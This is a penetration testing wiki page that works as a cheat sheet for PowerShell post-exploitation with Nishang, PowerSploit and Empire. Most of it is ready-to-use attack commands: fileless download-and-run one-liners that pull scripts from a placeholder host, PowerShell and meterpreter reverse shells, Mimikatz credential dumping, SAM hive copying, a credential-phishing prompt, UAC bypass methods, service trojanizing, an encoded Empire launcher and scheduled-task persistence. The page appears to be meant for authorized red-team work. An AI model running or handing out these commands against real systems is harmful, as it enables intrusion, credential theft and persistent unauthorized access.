PowerShell frameworks for Post-exploitation

Penetration Testing Wiki

In this section we will review different powershell frameworks used to help us with the post-exploitation phase.

Intro to PowerShell

To check the version:

Powershell v1.0: Win XP SP2, 2003 Server SP1, Vista
Powershell v2.0: Win 7, Server 2008 R2
Powershell v3.0: Win 8, Server 2012
Powershell v4.0: Win 8.1, Server 2012 R2
Powershell v5.0: Win 10

Change default colors:

$host.ui.RawUI.ForegroundColor = "black"
$host.ui.RawUI.BackgroundColor = "white"

To compile a ps1 into .exe use ”PowerGUI Pro script editor”

  • List hotfixes

Equivalent using wmic:

wmic qfe list
  • Detect sandboxed environment
Get-wmiobject win32_bios | format-list Name,SerialNumber
  • Handling Certificates

To see installed user certificates

Get-ChildItem -Path "Cert:\CurrentUser\My"
Get-ChildItem -Path "Cert:\LocalMachine"

Using GUI:


To create a self-signed certificate:

$cert = New-SelfSignedCertificate -certstorelocation cert:\localmachine\my -dnsname testcert.example.org
  • Show system uptime:
Get-CimInstance -ClassName win32_operatingsystem | select csname, lastbootuptime

Some examples of PowerShell Scripts

Capturing a screenshot

[Parameter(Mandatory = $true)][string]$Path
$FileName = "$env:COMPUTERNAME - $(get-date -f yyyy-MM-dd_HHmmss).bmp"
$File = "$Path\$FileName"
Add-Type -AssemblyName System.Windows.Forms
Add-type -AssemblyName System.Drawing
$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
$Width = $Screen.Width
$Height = $Screen.Height
$Left = $Screen.Left
$Top = $Screen.Top
$bitmap = New-Object System.Drawing.Bitmap $Width, $Height
$graphic = [System.Drawing.Graphics]::FromImage($bitmap)
$graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size)
Write-Output "Screenshot saved to:"
Write-Output $File

Source: https://www.pdq.com/blog/capturing-screenshots-with-powershell-and-net/

Nishang Framework

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.

in kali: /usr/share/nishang

powershell.exe –exec bypass –Command "& {Import-Module 'C:\Users\User\Desktop\temp\Port-Scan.ps1'; Port-Scan –StartAddress –Endaddress –ResolveHost -ScanPort }"
powershell.exe –exec bypass –Command "& {Import-Module 'C:\Users\User\Desktop\temp\Remove-Update.ps1'; Remove-Update KB2534366}"
powershell.exe –exec bypass –Command "& {Import-Module 'C:\Users\User\Desktop\temp\Invoke-CredentialsPhish.ps1'; Invoke-CredentialsPhish}"
powershell.exe –exec bypass –Command "& {Import-Module 'C:\Users\User\Desktop\temp\Get-PassHashes.ps1'; Get-PassHashes}"

Fileless execution with nishang:

powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP/Check-VM.ps1'); Check-VM"

Dont work in Windows 7:

powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP/winpost/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress $IP -Port 443"

In Windows 7:

powershell -ep bypass -command "(New-Object Net.WebClient).DownloadFile('http://$IP/winpost/Invoke-PowerShellTcp.ps1', 'Invoke-PowerShellTcp.ps1'); Import-Module .\Invoke-PowershellTcp.ps1; Invoke-PowershellTcp -IPAddress $LOCALIP -Reverse -Port 443"

Other useful modules:

  • Powerpreter
  • Out-CHM
  • Out-Word
  • Out-Excel
  • Out-HTA

Powersploit Framework

powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP:8000/CodeExecution/Invoke-Shellcode.ps1');\ Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $LOCALIP -Lport 4444 -Force"
IEX (New-Object Net.WebClient).DownloadString("http://$IP:8000/Recon/Invoke-ReverseDnsLookup.ps1");\ Invoke-ReverseDnsLookup -IpRange $IP/24
IEX (New-Object Net.WebClient).DownloadString("http://$IP:8000/Exfiltration/Invoke-Mimikatz.ps1");\ Invoke-Mimikatz -DumpCreds
IEX (New-Object Net.WebClient).DownloadString("http://$IP:8000/Exfiltration/Invoke-NinjaCopy.ps1");\ Invoke-NinjaCopy -Path "C:\Windows\System32\config\SAM" -LocalDestination "C:\Users\master\Desktop\SAM"

Powersploit modules: PowerUP

PowerUp is a PowerShell tool to assist with local privilege escalation on Windows systems. It contains several methods to identify and abuse vulnerable services, as well as DLL hijacking opportunities, vulnerable registry settings, and escalation opportunities. It is part of PowerSploit and resides at https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc. Empire implements PowerUp’s escalation functionality in the privesc/powerup/* modules.

powershell.exe -nop -exec bypass
Import-Module .\PowerUp.ps1
Invoke-AllChecks | Out-File -Encoding ASCII checks.txt

Powersploit modules: BypassUAC

import-module .\bypass-uac.ps1

Does not work for Windows Server 2012:

Bypass-UAC -Method UacMethodSysprep

Work for Windows Server 2012:

Bypass-UAC -Method ucmDismMethod
Bypass-UAC -Method UacMethodMMC2

More info:

Powersploit modules: Trojanize DLL

See also Msfvenom Payloads Cheat Sheet.

Powersploit modules: Trojanize Windows Service

Write-ServiceBinary [-Name] <String> [-UserName <String>] [-Password <String>] [-LocalGroup <String>] [-Credential <PSCredential>] [-Command <String>] [-Path <String>]

Source: https://powersploit.readthedocs.io/en/latest/Privesc/Write-ServiceBinary/

Empire Framework

Empire is a PowerShell and Python post-exploitation agent


git clone https://github.com/EmpireProject/Empire.git
cd Empire/


(Empire) > listeners
(Empire: listeners) > uselistener http
(Empire: listeners/http) > execute
(Empire: listeners/http) > launcher powershell
powershell -noP -sta -w 1 -enc SQBmACgAJA<REDACTED>QB8AEkARQBYAA==
(Empire: listeners/http) >

Copy the generated powershell payload in the Windows target to open a session in Empire:

powershell -noP -sta -w 1 -enc SQBmACgAJAQB8AEkARQBYAA==

To handle agents in Empire:

interact $AGENTID
rename [old name] [new name]

Advanced modules:

bypassuac http
set Listener http

or disk-less:

usemodule privesc/bypassuac_wscript

For credentials gathering:



usemodule persistence/elevated/schtasks



A Powershell Privilege Escalation Enumeration Script